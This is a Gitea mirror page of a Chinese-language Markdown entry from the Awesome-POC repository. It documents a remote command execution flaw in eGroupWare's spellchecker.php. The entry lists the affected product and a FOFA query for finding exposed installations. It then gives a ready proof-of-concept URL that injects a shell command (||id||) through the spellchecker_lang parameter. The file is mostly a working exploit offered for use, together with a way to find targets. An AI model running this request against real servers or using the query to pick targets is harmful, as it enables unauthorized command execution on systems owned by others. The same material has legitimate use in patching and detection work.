admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-06 11:27:43 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/Web应用漏洞/eGroupWare spellchecker.php 远程命令执行漏洞.md
Threekiii cba0c4db58 更新漏洞
2022-12-05 11:09:28 +08:00

31 lines
685 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# eGroupWare spellchecker.php 远程命令执行漏洞
## 漏洞描述
*eGroupWare*是一个多用户在以PHP为基础的API上的定制集为基础开发的以WEB为基础的工作件套装其中 spellchecker.php 文件中存在命令执行漏洞
## 漏洞影响
```
eGroupWare
```
## FOFA
```
app="EGROUPWARE-产品"
```
## 漏洞复现
登录页面
![image-20220524171233435](./images/202205241712519.png)
验证POC
```
/egroupware/phpgwapi/js/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php?spellchecker_lang=egroupware_spellchecker_cmd_exec.nasl%7C%7Cid%7C%7C
```
![image-20220524171251702](./images/202205241712784.png)
Reference in New Issue View Git Blame Copy Permalink